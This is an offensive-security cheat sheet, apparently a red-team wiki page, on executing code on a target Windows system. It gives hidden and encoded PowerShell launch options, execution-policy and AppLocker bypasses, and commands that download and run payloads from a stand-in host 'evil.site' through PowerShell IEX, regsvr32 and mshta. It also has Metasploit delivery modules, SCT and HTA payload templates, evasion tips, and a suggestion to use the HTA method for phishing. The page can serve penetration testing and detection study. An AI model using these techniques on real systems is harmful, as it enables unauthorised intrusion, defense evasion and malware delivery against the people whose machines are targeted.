Navigation :

Execution

Tips and tricks to execute your code on the target Windows sytem.

Simple Execution
Web Delivery
- PowerShell
- RegSvr32
- MSHTA
- MSBuild

Simple Execution

Different ways to perform simple command execution on the target system when CMD is not directly available.

WMIC

wmic process call create <CMD>
wmic process call create "cmd.exe /c <CMD>"

FTP

The ftp utility allows you to execute commands by preceding them by the ! sign.

ftp.exe
ftp> !<CMD>

You can also be dropped into a CMD prompt by typing ! without specifying any command.

ftp.exe
ftp> !
Microsoft Windows [Version 10.0.16299.547]
(c) 2017 Microsoft Corporation. All right reserved.

C:\Users\betelsam>

PowerShell

Description of the options to pass to powershell.exe to execute a custom PSH-CMD payload.

powershell.exe -nop -w hidden -e <base64-unicode payload>
powershell.exe -nop -w hidden -command "<raw powershell command>"

Option	Description
`-NoP`	Short for `-NoProfile`, prevents PowerShell from loading a profile of custom settings.
`-NonI`	Prevents PowerShell from displaying an interactive prompt to the user on the screen.
`-W Hidden`	Sets the window style for PowerShell to Hidden.
`-Exec Bypass`	Sets the execution policy for PowerShell to Bypass (code needs to run with admin privileges).
`-e <BASE64>`	Short for `-EncodedCommand`, accepts a base64-encoded unicode-string version of a command.
`-Command "<COMMANDS>"`	Executes the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt.

Info

The -EncodedCommand option is expecting a unicode-string (UTF16LE) encoded in base64. The unicode part is very important as most of our strings representations use UTF8 instead, which will not work in this case.

To encode a string in unicode, use the following CyberChef recipe: [https://gchq.github.io/CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF16LE%20(1200)')To_Base64(‘A-Za-z0-9%2B/%3D’))

Alternatively, see the base64 (unicode) section of the PowerShell page to encode a script file in unicode.

Tip

Alternative way to launch PowerShell: forfiles /p %COMSPEC:~0,19% /s /c "@file -noe" /m po*l.*e

External Resources

https://github.com/api0cradle/UltimateAppLockerByPassList

Web Delivery

Deliver your payload hosted on a web server.

PowerShell

IEX (New-Object System.Net.WebClient).DownloadString('http://evil.site/powershell-payload.txt')

Tip

Deliver a base64-encoded payload to obfuscate its purpose and try to evade security solutions. See the base64 section of the PowerShell page for decoding procedure.

Proxy Configuration:

By default, this command will use the proxy configured for the system in Internet Options. Configure the Net.WebClient object to bypass the proxy for a specific request:

$wc = New-Object Net.WebClient
$wc.proxy = $null

In the case of a proxy requiring authentication, configure the Net.WebClient object to use the Windows session credentials:

$wc = New-Object Net.WebClient
$wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials

Ignore Certificate Issues:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}

RegSvr32

Delivers a JScript payload that uses ActiveX to execute a command (see Windows Script Host).

regsvr32 /s /n /u /i:http://evil.site/payload scrobj.dll

Metasploit: auxiliary/server/regsvr32_command_delivery_server:

use auxiliary/server/regsvr32_command_delivery_server
set cmd [COMMAND]

Metasploit: exploit/multi/script/web_delivery:

use exploit/multi/script/web_delivery
set target Regsvr32

Warning

This one will chain a secondary PowerShell web delivery to execute the payload set using set payload. Since this might not be what you want, prefer the other one which has more granular control on what is being executed.

Custom Payload:

<?XML version="1.0"?>
<scriptlet>
    <registration progid="[RANDOM ALPHANUM ID]" classid="{c0cc880f-3456-9812-15ba-cfee08744d70}">
        <script>
            <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe",0);]]>
        </script>
    </registration>
</scriptlet>

Note that classid could be any random UID.

MSHTA

Delivers a HTML Application (HTA) capable of running VBS or JS (see Windows Scripting Host) either as a full-fledge website or via command line. See Microsoft documentation for more details.

mshta http://evil.site/payload.hta

This could also be used in a phishing attack by simply tricking the user to visit the webpage using Internet Explorer or Edge.

Metasploit: exploit/windows/misc/hta_server:

use exploit/windows/misc/hta_server
set target Powershell [x86/x64]
set payload [PAYLOAD]

This will use VBA to execute any PSH-CMD payload.

Custom Payload: As an HTA application is a full-fledge website that can embed VBS or JS, you can use both to use execute any command via ActiveX.

Example using VBScript:

<script language="VBScript">
  Set objShell = CreateObject("Wscript.Shell")
  objShell.Run "calc.exe",0
  window.close()
</script>

Example using JScript:

<script language="JScript">
    var objShell = new ActiveXObject("WScript.shell");
    objShell.run('"calc.exe"');
    window.close();
</script>

MSBuild

TO TEST AND DOCUMENT